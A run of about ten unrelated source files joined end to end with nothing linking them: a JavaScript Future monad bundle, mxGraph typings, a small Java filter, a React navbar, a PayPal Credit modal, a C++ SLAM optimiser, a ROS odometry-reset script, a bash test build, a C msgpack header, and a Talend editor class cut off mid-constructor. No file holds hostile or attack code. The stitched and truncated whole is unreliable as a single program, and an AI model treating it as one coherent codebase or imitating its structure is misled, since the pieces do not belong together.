!function(e){if("object"==typeof exports)module.exports=e();else if("function"==typeof define&&define.amd)define(e);else{var f;"undefined"!=typeof window?f=window:"undefined"!=typeof global?f=global:"undefined"!=typeof self&&(f=self),f.Future=e()}}(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);throw new Error("Cannot find module '"+o+"'")}var f=n[o]={exports:{}};t[o][0].call(f.exports,function(e){var n=t[o][1][e];return s(n?n:e)},f,f.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
/** * @module lib/future */ module.exports = Future // -- Dependencies ----------------------------------------------------- var memoisedFork = _dereq_('./memoised').memoisedFork // -- Implementation --------------------------------------------------- /** * The `Future[α, β]` structure represents values that depend on time. This * allows one to model time-based effects explicitly, such that one can have * full knowledge of when they're dealing with delayed computations, latency, * or anything that can not be computed immediately. * * A common use for this structure is to replace the usual Continuation-Passing * Style form of programming, in order to be able to compose and sequence * time-dependent effects using the generic and powerful monadic operations. * * @class * @summary * ((α → Void), (β → Void) → Void) → Future[α, β] * * Future[α, β] <: Chain[β] * , Monad[β] * , Functor[β] * , Show */ function Future(f) { this.fork = f } /** * Creates a `Future[α, β]` that computes the action at most once. * * Since this function will remember the resolved value of the future, **it's * expected to be used only for pure actions,** otherwise you may not be able * to observe the effects. * * @summary ((α → Void), (β → Void) → Void) → Future[α, β] */ Future.prototype.memoise = function _memoise(f) { var future = new Future() future.fork = memoisedFork(f, future) return future } Future.memoise = Future.prototype.memoise /** * Constructs a new `Future[α, β]` containing the single value `β`. * * `β` can be any value, including `null`, `undefined`, or another * `Future[α, β]` structure. * * @summary β → Future[α, β] */ Future.prototype.of = function _of(b) { return new Future(function(_, resolve){ return resolve(b) }) } Future.of = Future.prototype.of // -- Functor ---------------------------------------------------------- /** * Transforms the successful value of the `Future[α, β]` using a regular unary * function. 
* * @summary @Future[α, β] => (β → γ) → Future[α, γ] */ Future.prototype.map = function _map(f) { return this.chain(function(a){ return Future.of(f(a)) }) } // -- Chain ------------------------------------------------------------ /** * Transforms the succesful value of the `Future[α, β]` using a function to a * monad. * * @summary @Future[α, β] => (β → Future[α, γ]) → Future[α, γ] */ Future.prototype.chain = function _chain(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(a) } , function(b){ return f(b).fork(reject, resolve) }) }.bind(this)) } // -- Show ------------------------------------------------------------- /** * Returns a textual representation of the `Future[α, β]` * * @summary @Future[α, β] => Void → String */ Future.prototype.toString = function _toString() { return 'Future' } // -- Extracting and recovering ---------------------------------------- /** * Transforms a failure value into a new `Future[α, β]`. Does nothing if the * structure already contains a successful value. * * @summary @Future[α, β] => (α → Future[γ, β]) → Future[γ, β] */ Future.prototype.orElse = function _orElse(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return f(a).fork(reject, resolve) } , function(b){ return resolve(b) }) }.bind(this)) } // -- Folds and extended transformations ------------------------------- /** * Catamorphism. Takes two functions, applies the leftmost one to the failure * value, and the rightmost one to the successful value, depending on which one * is present. * * @summary @Future[α, β] => (α → γ), (β → γ) → Future[δ, γ] */ Future.prototype.fold = function _fold(f, g) { return new Future(function(reject, resolve) { return this.fork( function(a){ return resolve(f(a)) } , function(b){ return resolve(g(b)) }) }.bind(this)) } /** * Swaps the disjunction values. 
* * @summary @Future[α, β] => Void → Future[β, α] */ Future.prototype.swap = function _swap() { return new Future(function(reject, resolve) { return this.fork( function(a){ return resolve(a) } , function(b){ return reject(b) }) }.bind(this)) } /** * Maps both sides of the disjunction. * * @summary @Future[α, β] => (α → γ), (β → δ) → Future[γ, δ] */ Future.prototype.bimap = function _bimap(f, g) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(f(a)) } , function(b){ return resolve(g(b)) }) }.bind(this)) } /** * Maps the left side of the disjunction (failure). * * @summary @Future[α, β] => (α → γ) → Future[γ, β] */ Future.prototype.rejectedMap = function _rejectedMap(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(f(a)) } , function(b){ return resolve(b) }) }.bind(this)) } },{"./memoised":3}],2:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. module.exports = _dereq_('./future') },{"./future":1}],3:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. /** * @module lib/memoised */ /** * A function that memoises the result of a future operation, for performance * of pure futures. * * @method * @summary ((α → Void), (β → Void) → Void), Future[α, β] → ((α → Void), (β → Void) → Void) */ exports.memoisedFork = memoisedFork function memoisedFork(f, future) { var pending = [] var started = false var resolved = false var rejected = false return fold // The fold applies the correct operation to the future's value, if the // future has been resolved. 
Or we run the operation instead. // // For optimisation purposes, we cache the result of the operation, so // if we started an operation before, we mark it as started and push // any subsequent forks into a pending queue that will be invoked once // the original fork returns. function fold(g, h) { return resolved? h(future.value) : rejected? g(future.value) : started? addToPendingOperations(g, h) : /* otherwise */ resolveFuture(g, h) } // Remembers some operation to fire at a later point in time, when the // future gets resolved function addToPendingOperations(g, h) { pending.push({ rejected: g, resolved: h }) } // Resolves the future, and memorises its value and resolution strategy function resolveFuture(g, h) { started = true return f( function(a) { rejected = true future.value = a invokePending('rejected', a) return g(a) } , function(b) { resolved = true future.value = b invokePending('resolved', b) return h(b) }) } // Invokes operations that were added before the future got a value function invokePending(kind, value) { var xs = pending started = false pending.length = 0 for (var i = 0; i < xs.length; ++i) xs[i][kind](value) } } },{}]},{},[2]) (2) });
declare module 'mxgraph' { class mxImage { constructor(src: string, width: number, height: number); /** * Variable: src * * String that specifies the URL of the image. */ src: string; /** * Variable: width * * Integer that specifies the width of the image. */ width: number; /** * Variable: height * * Integer that specifies the height of the image. */ height: number; } }
public class FilterNumberArray { public static void main(String[] args) { int[] array = {1, 2, 3, 4, 5, 6, 7, 8, 9}; int divisor = 2; int[] result = new int[array.length]; for (int i = 0; i < array.length; i++) { if (array[i] % divisor == 0) { result[i] = array[i]; } } System.out.print("["); for (int i = 0; i < result.length; i++) { if (result[i] != 0) { System.out.print(result[i] + ", "); } } System.out.println("]"); } }
import Navbar from "react-bootstrap/Navbar" import site from "../config/site" import Link from "next/link" import { FontAwesomeIcon } from "@fortawesome/react-fontawesome" import { faBug, faHome, faTags, faSearch, faFolder, faRss, faInfoCircle, } from "@fortawesome/free-solid-svg-icons" import Nav from "react-bootstrap/Nav" import NavDropdown from "react-bootstrap/NavDropdown" import { useRouter } from "next/router" export default function Header({ collections }) { const router = useRouter() const activeKey = router.pathname.startsWith("/tag/") ? "/tag" : router.pathname return ( <Navbar bg="light" expand="md" className="shadow-sm"> <Link href="/" passHref> <Navbar.Brand> <FontAwesomeIcon icon={faBug} fixedWidth size="lg" /> {site.title} </Navbar.Brand> </Link> <Navbar.Toggle /> <Navbar.Collapse> <Nav className="me-auto" activeKey={activeKey}> <Nav.Item> <Link href="/" passHref> <Nav.Link> <FontAwesomeIcon icon={faHome} fixedWidth /> 主页 </Nav.Link> </Link> </Nav.Item> <Nav.Item> <Link href="/tag/" passHref> <Nav.Link> <FontAwesomeIcon icon={faTags} fixedWidth /> 标签 </Nav.Link> </Link> </Nav.Item> <Nav.Item> <Link href="/search/" passHref> <Nav.Link> <FontAwesomeIcon icon={faSearch} fixedWidth /> 搜索 </Nav.Link> </Link> </Nav.Item> <NavDropdown title={ <> <FontAwesomeIcon icon={faFolder} fixedWidth /> 分类 </> } id="navbarDropdown" > {collections.map((collection) => ( <Link href={`/${collection.slug}/`} key={collection.slug} passHref > <NavDropdown.Item>{collection.name}</NavDropdown.Item> </Link> ))} </NavDropdown> <Nav.Item> <Nav.Link href={new URL("/atom.xml", site.url).href}> <FontAwesomeIcon icon={faRss} fixedWidth /> RSS </Nav.Link> </Nav.Item> </Nav> <Nav className="my-2 my-lg-0" activeKey={router.pathname}> <Nav.Item> <Link href="/about/" passHref> <Nav.Link> <FontAwesomeIcon icon={faInfoCircle} fixedWidth /> 关于 </Nav.Link> </Link> </Nav.Item> </Nav> </Navbar.Collapse> </Navbar> ) }
import arrayFrom from 'core-js-pure/stable/array/from';
import stringStartsWith from 'core-js-pure/stable/string/starts-with';
import { ZalgoPromise } from 'zalgo-promise/src';
import getModalMarkup from '../../services/modal';
import { Logger, ERRORS } from '../../services/logger';
import createContainer from '../Container';
import { initParent, getModalElements } from './utils';
import { createState, memoizeOnProps, pipe, pluck, nextId } from '../../../utils';
import { getModalContent, getModalType } from '../../../locale';

// Builds the PayPal Credit promotion modal: a full-viewport wrapper <div>
// containing an <iframe> whose markup is fetched lazily. Returns { open,
// close } handlers. State machine: CLOSED -> OPENING -> OPEN -> CLOSING.
function createModal(options) {
    const wrapper = window.top.document.createElement('div');
    const id = nextId();
    wrapper.setAttribute('data-pp-id', id);
    const [iframe, { insertMarkup }] = createContainer('iframe');
    const [parentOpen, parentClose] = initParent();
    const { track, clickUrl } = options;
    const [state, setState] = createState({ status: 'CLOSED' });
    const modalType = getModalType(options.offerCountry, options.offerType);
    // Emit an analytics event; opens are impressions, everything else clicks.
    const trackModalEvent = (type, linkName, amount) =>
        track({
            et: type === 'modal-open' ? 'CLIENT_IMPRESSION' : 'CLICK',
            link: linkName,
            amount,
            modal: modalType,
            event_type: type
        });
    const modalContent = getModalContent(options, state, trackModalEvent);
    const logger = Logger.create({ id, account: options.account, selector: '__internal__', type: 'Modal' });

    // Resolve when modal markup is ready; if a previous fetch failed, retry
    // with the cache bypassed.
    function ensureReady() {
        if (state.error) {
            // eslint-disable-next-line no-use-before-define
            return prepModal(true);
        }
        return state.modalProm;
    }

    // Click handler. If the markup could not be loaded, fall back to opening
    // the offer URL in a new tab instead of showing a broken modal.
    function openModal(evt) {
        evt.preventDefault();
        if (state.status === 'CLOSED' || state.status === 'CLOSING') {
            setState({ status: 'OPENING' });
            ensureReady().then(() => {
                if (state.error) {
                    setState({ status: 'CLOSED' });
                    window.open(clickUrl, '_blank');
                    return;
                }
                wrapper.style.display = 'block';
                // Ensure iframe has been painted so that it's focusable in Firefox
                // Focus iframe window so that keyboard events interact with the modal
                requestAnimationFrame(() =>
                    requestAnimationFrame(() => {
                        iframe.contentWindow.focus();
                        setState({ status: 'OPEN' });
                        parentOpen();
                        state.frameElements.modalContainer.classList.add('show');
                        trackModalEvent('modal-open');
                    })
                );
            });
        }
    }

    // Hide the modal after `delay` ms (lets the CSS close transition play).
    // Rejects if the modal is not currently open/opening.
    function closeModal(delay) {
        return new ZalgoPromise((resolve, reject) => {
            if (state.status === 'OPEN' || state.status === 'OPENING') {
                setState({ status: 'CLOSING' });
                state.frameElements.modalContainer.classList.remove('show');
                setTimeout(() => {
                    wrapper.style.display = 'none';
                    iframe.blur();
                    setState({ status: 'CLOSED' });
                    parentClose();
                    modalContent.onClose();
                    resolve();
                }, delay || 0);
            } else {
                reject();
            }
        });
    }

    // Close with the standard 350ms transition and log which control did it.
    function closeEvent(link) {
        closeModal(350);
        trackModalEvent('modal-close', link);
    }

    // Wire all interactions inside the freshly-inserted iframe markup:
    // close button, overlay click, sticky header on scroll, Escape key,
    // lander links, and content-specific handlers.
    function addModalEventHandlers() {
        state.frameElements.closeButton.addEventListener('click', () => {
            closeEvent('Close Button');
        });
        state.frameElements.overlay.addEventListener('click', ({ target }) => {
            if (target === state.frameElements.contentWrapper || target === state.frameElements.headerContainer) {
                closeEvent('Modal Overlay');
            }
        });
        const onScroll = () => {
            if (state.frameElements.contentWrapper.scrollTop > 0) {
                state.frameElements.header.classList.add('show');
            } else {
                state.frameElements.header.classList.remove('show');
            }
        };
        state.frameElements.contentWrapper.addEventListener('scroll', onScroll);
        state.frameElements.contentWrapper.addEventListener('touchmove', onScroll);
        iframe.contentWindow.addEventListener('keyup', evt => {
            if (evt.key === 'Escape' || evt.key === 'Esc' || evt.charCode === 27) {
                closeEvent('Escape Key');
            }
        });
        arrayFrom(state.frameElements.landerLinks).forEach(link => {
            link.addEventListener('click', () => trackModalEvent('lander-link'));
        });
        modalContent.addHandlers(modalType, state.contentElements, trackModalEvent);
    }

    // Fetch the modal markup, inject it into the iframe, and cache element
    // references. On failure, records state.error so openModal can fall back.
    function prepModal(ignoreCache = false) {
        // Account required in the start event on the server-side
        logger.start({ options: { account: options.account, offerType: options.offerType, amount: options.amount, message_id: options.id } });
        return getModalMarkup(options, ignoreCache)
            .then(pipe(pluck('markup'), insertMarkup))
            .then(() => {
                setState({
                    frameElements: getModalElements(iframe),
                    contentElements: modalContent.getElements(iframe, modalType)
                });
                addModalEventHandlers();
            })
            .catch(err => {
                if (__LOCAL__) {
                    console.error(err);
                }
                logger.error({ name: ERRORS.MODAL_FAIL });
                setState({ error: true });
            })
            .then(() => logger.end());
    }

    // Accessibility tags
    wrapper.setAttribute('role', 'alertdialog');
    wrapper.setAttribute('aria-label', 'PayPal Credit Promotion Modal');
    wrapper.setAttribute(
        'style',
        'display: none; overflow: auto; -webkit-overflow-scrolling: touch; position: fixed; top: 0; left: 0; right: 0; bottom: 0; z-index: 2147483647; margin: 0; padding: 0; border: 0;'
    );
    iframe.setAttribute(
        'style',
        'position: absolute; top: 0; left: 0; overflow: hidden; width: 100%; height: 100%; margin: 0; padding: 0; border: 0; display: block;'
    );
    wrapper.appendChild(iframe);
    window.top.document.body.appendChild(wrapper);

    // Start fetching markup immediately so opening is instant later.
    setState({ modalProm: prepModal() });
    ensureReady().then(() => modalContent.onLoad());

    return { open: openModal, close: closeModal };
}

// One modal instance per (account, amount, offerType) combination.
const getModal = memoizeOnProps(createModal, ['account', 'amount', 'offerType']);

export default {
    init({ options, meta, events, track }) {
        // Legacy NI (no-interest) offers keep the old popup-window behavior;
        // everything else gets the in-page modal.
        if (options._legacy && stringStartsWith(meta.offerType, 'NI')) {
            events.on('click', evt => {
                const { target } = evt;
                if (target.tagName === 'IMG' && target.parentNode.tagName === 'A') {
                    window.open(
                        target.parentNode.href,
                        'PayPal Credit Terms',
                        'width=650,height=600,scrollbars=yes,resizable=no,location=no,toolbar=no,menubar=no,dependent=no,dialog=yes,minimizable=no'
                    );
                    evt.preventDefault();
                } else {
                    window.open(meta.clickUrl, '_blank');
                }
            });
        } else {
            const { open: openModal } = getModal({ ...options, ...meta, track });
            events.on('click', openModal);
        }
    }
};
// Copyright (c) 2015-2016, ETH Zurich, Wyss Zurich, Zurich Eye
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//     * Redistributions of source code must retain the above copyright
//       notice, this list of conditions and the following disclaimer.
//     * Redistributions in binary form must reproduce the above copyright
//       notice, this list of conditions and the following disclaimer in the
//       documentation and/or other materials provided with the distribution.
//     * Neither the name of the ETH Zurich, Wyss Zurich, Zurich Eye nor the
//       names of its contributors may be used to endorse or promote products
//       derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
// ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
// WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL ETH Zurich, Wyss Zurich, Zurich Eye BE LIABLE FOR ANY
// DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
// LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
// ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#include <ze/geometry/clam.hpp>

#include <ze/geometry/pose_optimizer.hpp>
#include <ze/geometry/pose_prior.hpp>

namespace ze {

// Clam: joint localization-and-mapping least-squares problem.
// State is (T_Bc_Br, inverse depths); the residual combines bearing-vector
// localization errors, landmark reprojection errors, and an optional pose
// prior.
Clam::Clam(
    const ClamLandmarks& landmarks,
    const std::vector<ClamFrameData>& data,
    const CameraRig& rig,
    const Transformation& T_Bc_Br_prior,
    const real_t prior_weight_pos,
    const real_t prior_weight_rot)
  : landmarks_(landmarks)
  , data_(data)
  , rig_(rig)
  , T_Bc_Br_prior_(T_Bc_Br_prior)
  , prior_weight_pos_(prior_weight_pos)
  , prior_weight_rot_(prior_weight_rot)
{
  // One robust measurement sigma per camera/frame, estimated lazily at the
  // first iteration of evaluateError().
  measurement_sigma_localization_.resize(data.size());
  CHECK_EQ(landmarks_.f_Br.cols(), landmarks_.origin_Br.cols());
}

// Evaluates chi2 = sum of whitened, robust-weighted squared residuals for
// the given state, and (when H and g are non-null) accumulates the
// Gauss-Newton Hessian approximation and gradient.
// NOTE(review): only the localization section guards on (H && g); the
// mapping section below dereferences g (g->size()) and H unconditionally —
// presumably callers always pass both; confirm.
real_t Clam::evaluateError(
    const ClamState& state, HessianMatrix* H, GradientVector* g)
{
  CHECK_EQ(data_.size(), measurement_sigma_localization_.size());
  real_t chi2 = 0.0;
  const Transformation& T_Bc_Br = state.at<0>();
  const VectorX& inv_depth = state.at<1>();

  // ---------------------------------------------------------------------------
  // Localization

  // Loop over all cameras in rig.
  for (size_t i = 0; i < data_.size(); ++i)
  {
    const ClamFrameData& data = data_[i];
    real_t& measurement_sigma = measurement_sigma_localization_[i];

    // Continue if we have no landmarks to localize with.
    if(data.p_Br.cols() == 0)
    {
      VLOG(300) << "Cam " << i << " has no landmarks to localize.";
      continue;
    }

    // Transform points from reference coordinates to camera coordinates.
    const Transformation T_C_Br = data.T_C_B * T_Bc_Br;
    //! @todo(cfo): use inverse-depth coordinates!
    const Positions p_C = T_C_Br.transformVectorized(data.p_Br);

    // Normalize points to obtain estimated bearing vectors.
    Bearings f_est = p_C;
    normalizeBearings(f_est);

    // Compute difference between bearing vectors.
    Bearings f_err = f_est - data.f_C;
    const VectorX f_err_norm = f_err.colwise().norm();

    // At the first iteration, compute the scale of the error.
    if(iter_ == 0)
    {
      measurement_sigma = ScaleEstimator::compute(f_err_norm);
    }

    // Robust cost function.
    const VectorX weights =
        WeightFunction::weightVectorized(f_err_norm / measurement_sigma);

    // Whiten error.
    f_err /= measurement_sigma;

    if (H && g)
    {
      const Matrix3 R_C_Br = T_C_Br.getRotationMatrix();
      const int n = data.f_C.cols();
      Matrix36 G;
      G.block<3,3>(0,0) = I_3x3;
      // NOTE(review): this inner `i` shadows the outer camera index `i`;
      // the body only uses per-landmark data, so behavior is correct, but a
      // distinct name (e.g. k) would be clearer.
      for (int i = 0; i < n; ++i)
      {
        // Jacobian computation.
        G.block<3,3>(0,3) = - skewSymmetric(data.p_Br.col(i));
        Matrix3 J_normalization = dBearing_dLandmark(p_C.col(i));
        Matrix36 J = J_normalization * R_C_Br * G;

        // Whiten Jacobian.
        J /= measurement_sigma;

        // Compute Hessian and Gradient Vector.
        H->topLeftCorner<6,6>().noalias() += J.transpose() * J * weights(i);
        g->head<6>().noalias() -= J.transpose() * f_err.col(i) * weights(i);
      }
    }

    // Compute log-likelihood : 1/(2*sigma^2)*(z-h(x))^2 = 1/2*e'R'*R*e
    chi2 += 0.5 * weights.dot(f_err.colwise().squaredNorm());
  }

  // ---------------------------------------------------------------------------
  // Mapping
  //! @todo(cfo): This can be optimized a lot!
  for (size_t i = 0; i < data_.size(); ++i)
  {
    const ClamFrameData& data = data_[i];
    const Camera& cam = rig_.at(i);
    // Each measurement pairs a landmark index with its observed keypoint.
    for (const std::pair<uint32_t, Keypoint>& m : data.landmark_measurements)
    {
      Matrix26 H1;
      Matrix21 H2;
      CHECK_LT(m.first, landmarks_.f_Br.cols());
      CHECK_LT(m.first, inv_depth.size());
      Vector2 err = reprojectionResidual(
            landmarks_.f_Br.col(m.first), landmarks_.origin_Br.col(m.first),
            cam, data.T_C_B, T_Bc_Br, inv_depth(m.first), m.second,
            &H1, &H2);

      // Robust cost function.
      const real_t weight = 1.0; //!< @todo(cfo)

      // Whiten error
      err /= measurement_sigma_mapping_;

      // Sparse Jacobian: 6 pose columns, then one column per inverse depth.
      Matrix2X J(2, g->size());
      J.setZero();
      J.block<2,6>(0, 0) = H1;
      J.block<2,1>(0, 6 + m.first) = H2;

      // Whiten Jacobian.
      J /= measurement_sigma_mapping_;

      // Compute Hessian and Gradient Vector.
      H->noalias() += J.transpose() * J * weight;
      g->noalias() -= J.transpose() * err * weight;

      // Compute log-likelihood : 1/(2*sigma^2)*(z-h(x))^2 = 1/2*e'R'*R*e
      chi2 += 0.5 * weight * err.squaredNorm();
    }
  }

  // ---------------------------------------------------------------------------
  // Prior
  if (prior_weight_rot_ > 0.0f || prior_weight_pos_ > 0.0f)
  {
    applyPosePrior(
          T_Bc_Br, T_Bc_Br_prior_, prior_weight_rot_, prior_weight_pos_,
          H->block<6,6>(0,0), g->segment<6>(0));
  }

  return chi2;
}

} // namespace ze
# repo: MikeHallettUK/RosRobotics
# read Odometry and reset to zero
#
# Subscribes to /odom, then repeatedly publishes on /reset (up to 4 times)
# until the reported yaw is close enough to zero, waiting ~4s between
# attempts for the reset to take effect.
import rospy
from nav_msgs.msg import Odometry  # nav_msgs/Odometry.msg
from std_msgs.msg import Empty
from tf.transformations import euler_from_quaternion
from math import radians, cos, tan, sin, sqrt, atan, pi, asin, exp
import numpy as np

rospy.init_node('resetter')
count = 0
start = rospy.get_rostime()
# Latest odometry snapshot: (move, turn, drift, yaw, x, y, seconds).
# seconds stays 0.0 until the first callback fires (used as a "ready" flag).
data = np.zeros(7)

def QtoYaw(orientation_q):
    """Convert a quaternion message to yaw in [0, 2*pi), anti-clockwise."""
    orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]
    (roll, pitch, yaw) = euler_from_quaternion (orientation_list)
    if yaw<0: yaw = 2*pi + yaw # goes from 0 to 2*pi, anti-clockwise. jumps at 0:2pi
    return yaw

def get_odom(msg): # at ~ 30 Hz
    """Odometry callback: snapshot pose and twist into the global `data`."""
    global start, data
    yaw = QtoYaw(msg.pose.pose.orientation)
    x = msg.pose.pose.position.x
    y = msg.pose.pose.position.y
    move = msg.twist.twist.linear.x
    drift = msg.twist.twist.linear.y
    turn = msg.twist.twist.angular.z
    now = msg.header.stamp - start
    seconds = now.to_sec() # time in floating point
    # np.copy produces a fresh array so readers never see a half-written one.
    data = np.copy((move, turn, drift, yaw, x, y, seconds))

subO = rospy.Subscriber('/odom', Odometry, get_odom) # nav_msgs/Odometry
reset_odom = rospy.Publisher('/reset', Empty, queue_size=1) # rostopic pub /reset std_msgs/Empty "{}"

print("Waiting for odom call back to start...")
while data[6] == 0: # wait for odom call back to start...
    rospy.sleep(0.1)

while count < 5:
    # Work on a copy so the callback can't change values mid-check.
    datacopy = np.copy(data)
    yaw = datacopy[3]
    # Re-centre yaw to (-pi, pi] so "close to zero" is a simple abs() check.
    if yaw > pi: yaw = yaw - 2*pi
    print("At %.3f secs, x %.4f , y %.4f : yaw %.4f, drift %.6f" % (datacopy[6], datacopy[4], datacopy[5], yaw, datacopy[2]))
    # (move, turn, drift, yaw, x, y, seconds)
    if abs(yaw) < 0.005: # eg. yaw is zeroed to better than +/- 0.3 degrees
        rospy.loginfo("Zero")
        break
    if count < 4:
        reset_odom.publish(Empty())
        print("reset")
        rospy.sleep(4.0) # it takes ~ 3 seconds to reset ....
    count = count + 1

# end of program ...
#!/bin/bash

# Build and run the get_next_line tester that reads from /dev/random.
#
# Strict mode makes a failed compile (or a failing tester) abort the script
# with a useful exit status; the old one-liner relied solely on `&&` and
# gave no indication of which step failed.
set -euo pipefail

gcc -Wall -Werror -Wextra \
    srcs/gnl_tester_devrandom.c \
    ../get_next_line.c \
    ../get_next_line_utils.c \
    -I ../ \
    -D BUFFER_SIZE=42 \
    -o a.out

./a.out
#ifndef LITE_PACK_LOAD_EXT_H #define LITE_PACK_LOAD_EXT_H #include "lite_pack/first_byte.h" #include "load_number.h" static inline unsigned __lip_load_fixext(unsigned char const buf[], uint8_t *type) { *type = __lip_load_num8(buf).u; return 1; } static inline unsigned __lip_load_ext8(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num8(buf).u; *type = __lip_load_num8(buf + 1).u; return 2; } static inline unsigned __lip_load_ext16(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num16(buf).u; *type = __lip_load_num8(buf + 2).u; return 3; } static inline unsigned __lip_load_ext32(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num32(buf).u; *type = __lip_load_num8(buf + 4).u; return 5; } #endif
// main/plugins/org.talend.designer.core/src/main/java/org/talend/designer/core/ui/MultiPageTalendEditor.java
// ============================================================================
//
// Copyright (C) 2006-2021 Talend Inc. - www.talend.com
//
// This source code is available under agreement available at
// %InstallDIR%\features\org.talend.rcp.branding.%PRODUCTNAME%\%PRODUCTNAME%license.txt
//
// You should have received a copy of the agreement
// along with this program; if not, write to Talend SA
// 9 rue Pages 92150 Suresnes, France
//
// ============================================================================
package org.talend.designer.core.ui;

import org.eclipse.core.runtime.IProgressMonitor;
import org.eclipse.swt.widgets.Text;
import org.eclipse.ui.IEditorInput;
import org.eclipse.ui.IEditorSite;
import org.eclipse.ui.IFileEditorInput;
import org.eclipse.ui.PartInitException;
import org.talend.core.GlobalServiceRegister;
import org.talend.core.PluginChecker;
import org.talend.core.model.process.IProcess2;
import org.talend.core.model.properties.Item;
import org.talend.core.model.properties.JobletProcessItem;
import org.talend.core.model.properties.Property;
import org.talend.core.services.ISVNProviderService;
import org.talend.core.ui.branding.IBrandingService;
import org.talend.designer.core.i18n.Messages;
import org.talend.designer.core.ui.editor.AbstractTalendEditor;
import org.talend.designer.core.ui.editor.ProcessEditorInput;
import org.talend.designer.core.ui.editor.TalendEditor;

/**
 * This class is the main editor; the different pages in it are: <br/>
 * <b>1)</b> {@link TalendEditor} <br/>
 * <b>2)</b> {@link Text Editor on the generated code} <br/>
 * <br/>
 * This class uses the interface ISelectionListener; it allows propagating the Delete event to the designer. <br/>
 *
 * $Id$
 *
 */
public class MultiPageTalendEditor extends AbstractMultiPageTalendEditor {

    /** Eclipse editor id, must match the plugin.xml contribution. */
    public static final String ID = "org.talend.designer.core.ui.MultiPageTalendEditor"; //$NON-NLS-1$

    public MultiPageTalendEditor() {
        this(true);
    }

    /**
     * @param withDefaultEditor when true, eagerly creates the graphical {@link TalendEditor} page.
     */
    protected MultiPageTalendEditor(boolean withDefaultEditor) {
        super();
